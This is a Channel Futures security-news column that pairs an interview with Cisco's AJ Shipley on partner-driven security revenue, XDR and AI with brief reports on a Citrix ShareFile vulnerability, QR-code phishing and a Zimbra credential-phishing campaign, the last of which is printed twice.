The Gately Report: Cisco Partners to Help IT Giant Reach Security Revenue Goal
Plus, CISA adds Citrix ShareFile flaw to its known exploited vulnerabilities catalog.
![Cisco partners drive cybersecurity revenue growth Cisco partners drive cybersecurity revenue growth](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/bltf1e09eb47181cd09/6523ea4ecf538542a6bfb9f5/Cybersecurity-Growth.jpg?width=700&auto=webp&quality=80&disable=upscale)
Channel Futures: MSPs are being forced to beef up their cybersecurity capabilities to meet customers’ increasing demands. How can Cisco help them with this?
Cisco’s AJ Shipley: We provide the products that those MSPs then manage on behalf of their own customers. So first and foremost, the way Cisco helps them is by providing them the full suite of products that they need. We wake up every single day and we think about the bad guy who’s waking up in other parts of the world trying to figure out how to compromise an organization, to either steal intellectual property, get ransomware in there to extort them to pay a ransom or do whatever else that they might want to do. And in some cases conduct cyber warfare in support of kinetic warfare.
So in that vein, you have to provide products that can detect and respond as effectively and as efficiently as possible, and a portfolio to do it because really sophisticated bad guys like that don’t rely on just an email vector to try to exploit an organization with a phishing email, or a multifactor authentication (MFA) push-bombing attack and overwhelming that. They will use whatever tactic and technique at their disposal in order to get into an organization. And if you look at a MITRE Att&ck matrix, it will show all of the different tactics and techniques that sophisticated adversaries will deploy. The problem is that if you’re not a security vendor that can cover all of those different tactics and techniques with different point products that also talk to each other and work well together in a way that can be managed by those service providers on behalf of that end customer, you’re going to have a really hard time detecting those sophisticated adversaries if you have to try to cobble together a bunch of point products to do it. And that’s what we’re focused on doing for our partners.
CF: How has Cisco’s threat, detection and response portfolio evolved? And is it evolving in response to the changing threat landscape? If so, how?
AJS: So if you look at how MITRE Att&ck is evolving, the adversaries that they are emulating, we similarly are evolving what we can detect and respond to because adversaries are not sitting still. A really good example of this recently is a lot of companies have been rushing to figure out how generative AI can be helpful for those companies, like very targeted marketing emails in order to better make use of their marketing spend. Adversaries are similarly using those capabilities to craft better phishing emails. In the past we could rely on really bad grammar in an email to detect phishing. We have to use other technologies because the adversaries are advancing.
Similarly, there’s research out there from some other security vendors where they were able to use things like generative AI to write malware with just a few instructions. Those adversaries are doing the exact same thing. And so our tactics and techniques to detect and respond to them have to continuously evolve. So that’s just par for the course. That’s something that we’re constantly doing in the portfolio.
CF: AI and cybersecurity is a big topic right now. How does Cisco fit into that?
AJS: If you listen to Chuck [Robbins’] interview with Jim Cramer on CNBC after our earnings call, he can tell you all about how Cisco is going after the AI space, not only with our Silicon One and building chips to help do really advanced stuff from an AI perspective, but also providing the interconnects between those different GPUs, and organizations wanting to standardize or move to Ethernet to connect that at very high rates of speed. So we play in the space both from a chip perspective and also an interconnect perspective. But also we’re using things like AI to generate policies for firewalls, to make sure that those policies are maximally effective, that we’re providing as much coverage of the attack surface as possible and not having to rely on a human to try to have to craft that. That’s a use of AI for good, to protect against bad guys who are using AI to try to exploit an organization.
Similarly, we are using AI in our detection and response capabilities to summarize what happened so that a highly technical, but overworked and overstressed analyst isn’t now responsible for writing a four-or five-paragraph after-action report that’s going to go up to the board with a whole bunch of highly technical stuff. They can rely on the use of AI to write that after-action report for them that’s going to get it probably 99% right. But more importantly, it’s going to put it in the language that the board can understand so that they can better make decisions next time so that it doesn’t happen again.
CF: How have recent acquisitions helped Cisco beef up its cybersecurity offerings?
AJS: We’ve increased our pace of acquisition here. That doesn’t mean that we’re going to stop innovating organically because we are still continuing to innovate organically and we always will. But we have been very strategic in using acquisitions and we will continue to be acquisitive, and you’ll see more coming to fill gaps or to accelerate capabilities on our portfolio.
Let me give you a couple of examples. Armorblox was an email security company that we recently acquired. We didn’t buy them for their email security product, which is a good product in and of itself. We have an email security product. We bought them for their technology and their talent around AI and large language models (LLMs), and generative AI. While harvesting some of the technology for our existing email security capabilities that we already have, we’re using that tech and talent in that team to really bolster our use of generative AI for things like that policy assistant or that SOC assistant.
Similarly, Oort is a relatively small company, but it is arguable that they created the identity threat detection and response term, or really, how do you detect and respond to the use of identity and identity-based attacks when they’re trying to exploit an organization, which augments Cisco’s really strong offerings around network detection and response, and endpoint detection and response. But identity is the new battleground. So we did that acquisition — it hasn’t closed yet — to add the identity piece to our overall XDR strategy to augment the endpoint in the cloud and the network, but also to bring in the identity piece. And we’ll continue to advance on other capabilities that we bring in from a threat detection and response perspective.
CF: A lot of organizations are having budget challenges. How can Cisco help partners meet these organizations’ cybersecurity needs on a tight budget?
AJS: Customers are finally moving to this idea of vendor consolidation for a lot of the reasons that you mentioned. There are obviously financial benefits to consolidating on vendors. And to be clear, I don’t — and we don’t — think that it’s going to consolidate down to a single vendor. But we do think that there will be probably a half-dozen vendors that organizations consolidate down to. There will be an application vendor, arguably Microsoft, and there will be a networking vendor and security vendor. Cisco thinks that we’re well-positioned to be that platform vendor.
There will be probably some cloud service providers. But there are going to be a handful of vendors, and Cisco being one of those platform players, this is where we get our economies of scale and our economies of scope to be able to help those organizations that might be challenged from a budget perspective, and be able to candidly do creative things with margins … so that we can make sure that we’re getting them as much coverage and capabilities as possible while still fitting into a margin structure. Single-product companies have a really hard time matching that. The way that Cisco helps is by consolidating away a lot of those other point-product vendors and helping customers start to consolidate down to three, four or five platform players. And that’s what we think the environment is going to look like in the next several years.
CF: Does feedback from partners and customers help shape Cisco’s cybersecurity product strategy? If so, how?
AJS: Obviously it does. There’s that old adage that the customer is always right, and we always will take feedback from customers. But also candidly, I think if you build your road maps, features and products based entirely on customer feedback, you’re going to build a product to address a problem that they have right now. But that product is not going to be available right now. It’s going to be available at some point in the future — six to nine, to 12 months in the future. And it’s debatable whether or not that customer is going to have the same problem six to nine, to 12 months in the future that you just now built a product, and have a product and market to go solve. So that’s why you can’t solely build your products based on customer feedback, because they’re going to give you the feedback of the problem that they have right now, not the problem that they think that they’re going to run into nine to 12, to 24 months from now.
There are a few customers or certainly folks in organizations that are thinking about the 12 to 24, to 36 months out, and when you can find those, when you can work with those, those are the ones who are really valuable to partners, from a customer perspective to start to build out your road map with an acknowledgment that no product is in market instantly.
CF: What do you find most dangerous about the current threat landscape?
AJS: One, the problem right now is the availability of these really sophisticated tools is so widespread, and there are all kinds of things on YouTube … on how to use these tools, and that it makes it really challenging, if not impossible, to actually figure out who’s targeting and attacking you. Is that a ransomware gang? Is that a nation-state? Is that an activist? That’s because they all look the same. So that’s challenging in and of itself, because you want to know, “Am I being targeted because I’m a critical infrastructure provider and I’m being targeted by nation-state as a prelude to kinetic warfare? Or am I being targeted by ransomware because they just want to extort some money? Or am I being targeted by my competitor because they want to steal intellectual property?” It’s really hard to distill that out because the tools make everybody look very similar.
Now, you compound that with some of these new technologies that we haven’t even fully thought through in terms of the implications of these new technologies. For example, generative AI is all the rage right now. I read a couple articles where there are these social media influencers who make hundreds of thousands or millions of dollars a year based on followers. Some of these social media influencers are complete AI generations; they’re not real people. They look like a real person and they post like a real person, but it is AI, and some of these folks are making hundreds of thousands to millions of dollars a year. I shouldn’t say folks; I should say these companies.
The thing that scares me is that technology could be used in ways to emulate adversaries or even mimic me. So in the past, you might get a phishing email that says it’s coming from AJ. Now all of a sudden maybe you get some pictures saying, “Hey, sharing some pictures of me from the ballgame last week” — that I was never at — “click on it if you want to see something.” The use of that technology and then the proliferation of these tools where it makes it really hard to figure out who’s targeting me, those two things combined are probably what scares me the most.
CF: In terms of cybersecurity, what can partners expect from Cisco for the remainder of 2023?
AJS: We just announced and launched our new XDR product that has been receiving a tremendous amount of fanfare from customers and analysts. We booked seven-figure deals even before the product launched. And so the demand and the backlog from customers for that new XDR solution is really strong. You’ll see us to continue to innovate and announce things around it.
We did the Cohesity announcement for automated ransomware recovery, where we’re partnering with Cohesity to be able to shrink that recovery point objective down to almost zero. And I think you’ll continue to hear about more integrations on that front with other infrastructure providers to really combat ransomware.
In the coming months we’ll have a public preview of our Cisco Secure Access capability, which really secures the user when they’re accessing an application or a device, regardless of where that user is accessing it from and regardless of where that application or that device exists. That user will get a consistent security posture.
We have some stuff coming around Duo. But in general, this notion of suites that we are aligning around, user protection suites to secure that user, cloud protection suites to secure the infrastructure that those users are traversing, and then our breach protection suites to detect and respond when those preventive controls have failed because the adversary is really sophisticated, those capabilities, those suite offerings coming out is what you’ll see for the remainder of 2023.
In other cybersecurity news …
The Cybersecurity and Infrastructure Security Agency (CISA) is warning that a critical Citrix ShareFile secure file transfer vulnerability is being targeted by unknown actors and has added the flaw to its catalog of known security flaws exploited in the wild.
Citrix ShareFile, also known as Citrix Content Collaboration, is a managed file transfer SaaS cloud storage solution that allows customers and employees to upload and download files securely.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA said.
Although CISA’s directive only applies to federal civilian executive branch (FCEB) agencies, it “strongly” urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of catalog vulnerabilities as part of their vulnerability management practice.
On June 13, Citrix released a security advisory on a new ShareFile storage zones vulnerability with a critical severity score of 9.8 out of 10, which could allow unauthenticated attackers to compromise customer-managed storage zones.
We couldn’t reach Citrix for an updated comment on this.
Travis Smith, vice president of Qualys‘ threat research unit, said this is an interesting vulnerability with “a highly prevalent software with deployment globally in the private sector and in government agencies.”
“Security teams should be concerned that this vulnerability could be exploited to deploy ransomware or exfiltrate data,” he said. “This is very similar to the MOVEit vulnerability that resulted in multiple data breaches. The Qualys threat research unit is closely monitoring the threat landscape to see if this is weaponized.”
John Gallagher, vice president of Viakoo Labs at Viakoo, said organizations need to patch ASAP. However, the question is how long will threat actors have to exploit this vulnerability.
“Many organizations lack an inventory of their devices and applications, specifically around what versions they have,” he said. “The ideal situation would be to have full visibility down to the firmware version number, combined with automated patching, and in the future, with software bills of materials tied to each application.”
Cofense has observed a phishing campaign predominantly targeting a notable energy company in the United States, employing QR codes to slip malicious emails into inboxes and bypass security.
Roughly one-third of the 1,000 emails attributed to this campaign targeted a large U.S. energy company, while the remaining attempts were made against firms in manufacturing, insurance, technology and financial services.
According to Cofense, this is the first time QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector.
Nathaniel Raymond, threat intelligence analyst at Cofense, said the average month-to-month growth percentage of the campaign is more than 270%. The overall campaign has increased by more than 2,400% since May 2023.
“QR codes are not historically popular as they are limited in the way a user can interact with them,” he said. “Scanning a QR code is limited to the mobile device used, which provides a user with a sneak peak of the link embedded in the QR code and verifies if the user wishes to go to the link. Scanning a QR code on a mobile device puts the user outside the protections of the enterprise environment.”
Mika Aalto, co-founder and CEO at Hoxhunt, said QR phishing is growing in popularity because people got used to scanning QR codes during the COVID-19 pandemic for digital menus, contactless payments and event check-ins.
“We’ve observed a global surge from a phishing campaign posing as Microsoft, in which a fake security update needs to be immediately reviewed and is only accessible via QR code,” he said. “Upon scanning, victims are redirected to a credential-harvesting site personalized to the recipient’s place of business engineered to steal their business account login credentials.”
While QR codes add an extra link in the attack chain, they can lower barriers of trust for users who’ve become accustomed to them as trustworthy gateways to services and sites, Aalto said. Some users might even trust QR codes more than links. Phishing campaigns containing multiple steps to an attack site can disorient the victim to the point they overlook some of the telltales of a phishing attack, while creating a false sense of security.
Additionally, QR codes offer anonymity and flexibility to attackers. The codes can be easily generated and distributed through various channels, including emails, messages or physical stickers placed in public spaces.
“Pointing your phone camera towards the QR code typically reveals the URL it leads to, at which point you should make sure this matches with the email sender,” he said. “Just be careful not to open the link by mistake while doing this. You should also be mindful of using QR code-scanning applications as some might redirect you to malicious websites regardless of what the QR code is.”
ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting Zimbra account users’ credentials. The campaign has been active since at least April and is still ongoing.
Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign’s targets are a variety of SMBs and governmental entities. According to ESET telemetry, the largest number of targets are located in Poland. However, victims in other European countries such as Ukraine, Italy, France and the Netherlands are also targeted. Latin American nations were hit, too. Ecuador tops the list of detections in that region.
Despite this campaign not being particularly technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration.
Initially, the target receives an email with a phishing page in an attached HTML file. The email warns the target about an email server update, account deactivation or similar issue, and directs the user to click on the attached file. After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization. In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the adversary. Then, the attacker is potentially able to infiltrate the affected email account.
It is likely the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets. The campaign observed by ESET relies only on social engineering and user interaction. However, this may not always be the case.
Anton Cherepanov, senior malware researcher at ESET, said there’s no indication of any targets in the United States. However, it has identified targets in Mexico.
“The worst-case outcome is that attackers could gain Zimbra administrator’s privileges, and then potentially root privileges on the server itself,” he said. “But it depends on many factors, such as potential password re-use, configuration used, etc.”
Organizations and individuals can protect themselves by using the most up-to-date Zimbra version, strong passwords and two-factor authentication (2FA), Cherepanov said.
“This mass-spreading campaign has already been ongoing for at least several months,” he said. “It’s hard to say what attackers will do next since ESET has just exposed this campaign.”
ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting Zimbra account users’ credentials. The campaign has been active since at least April and is still ongoing.
Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. The campaign’s targets are a variety of SMBs and governmental entities. According to ESET telemetry, the largest number of targets are located in Poland. However, victims in other European countries such as Ukraine, Italy, France and the Netherlands are also targeted. Latin American nations were hit, too. Ecuador tops the list of detections in that region.
Despite this campaign not being particularly technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration.
Initially, the target receives an email with a phishing page in an attached HTML file. The email warns the target about an email server update, account deactivation or similar issue, and directs the user to click on the attached file. After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization. In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the adversary. Then, the attacker is potentially able to infiltrate the affected email account.
It is likely the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets. The campaign observed by ESET relies only on social engineering and user interaction. However, this may not always be the case.
Anton Cherepanov, senior malware researcher at ESET, said there’s no indication of any targets in the United States. However, it has identified targets in Mexico.
“The worst-case outcome is that attackers could gain Zimbra administrator’s privileges, and then potentially root privileges on the server itself,” he said. “But it depends on many factors, such as potential password re-use, configuration used, etc.”
Organizations and individuals can protect themselves by using the most up-to-date Zimbra version, strong passwords and two-factor authentication (2FA), Cherepanov said.
“This mass-spreading campaign has already been ongoing for at least several months,” he said. “It’s hard to say what attackers will do next since ESET has just exposed this campaign.”
Cisco partners will play a crucial role in the IT giant’s goal for cybersecurity to reach over 25% of its annual revenue.
That’s according to AJ Shipley, Cisco’s vice president of product management for threat detection and response. This month, Cisco reported a record-setting $15.2 billion in revenue in its latest quarter, a year-over-year improvement of 11%, with profit of $4 billion. There’s a larger opportunity for Cisco partners.
Cybersecurity isn’t playing as big a role in Cisco’s overall revenue growth “as we like or as we intend it to,” Shipley said.
“And sometimes what gets lost in in the noise a little bit is if you look at the bookings and revenue of Cisco security, it’s still a $4 billion-a-year security product business,” he said. “And when you add services in, it ends up being north of $5 billion a year. We’re a $57 billion-a-year company, and so sometimes you get lost in the noise. But if you were to look at our bookings and revenue relative to a Palo Alto Networks or CrowdStrike, it actually makes us the second-largest security vendor out there behind Microsoft, which has actually done pretty amazing things in the last couple of years.”
Cisco Investing in Cybersecurity
Cybersecurity today makes up roughly 10% of Cisco’s overall bookings, Shipley said.
Cisco’s AJ Shipley
“We expect that security will be a very, very large part of the the near-future bookings for Cisco and actually could represent over time 25% plus of the total bookings that Cisco does,” he said. “And the company is investing along those lines, from Chuck Robbins, our CEO, and the board all the way down. Security is the one thing that the entire company across all of Cisco is putting all of their wood behind that arrow in order to get it to that place where it’s in the future, 25% plus of our of our annual revenue.”
Shipley is in charge of Cisco‘s email security, endpoint security, extended detection and response (XDR), network detection and response, cloud-based sandboxing and vulnerability management.
“It’s all of the products that, for the most part, we target at the security operations center (SOC),” he said. “And specifically what we focus on is when all of your preventative security controls have failed and the bad guy has gotten in, we’re focused on how can we detect as quickly as possible and get them out, and get that company back up and running.”
Enabling Cisco Partners
This effort can’t be achieved without Cisco partners, Shipley said.
“The reason for that is because a lot of those organizations just simply don’t have the people on their side in the SOC with the expertise, or can keep those people in seats long enough because they’re jumping around from job to job,” he said. “So they’re looking to outsource a lot of the management of those products and to manage workflows to partners. What we’re focused on from a Cisco perspective – potentially within my area of product portfolio – is how we enable those partners either to be VARs of these products into the SOC. But more importantly in this space, how they can be MSPs and MSSPs, and take the burden off of those end customers of having to manage this and keep people in seats so that their overall security posture stays as resilient as possible, and they’re able to detect and respond as quickly as possible when everything else is failing.”
Scroll through our slideshow above for more from Cisco and more cybersecurity news.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn. |
About the Author(s)
You May Also Like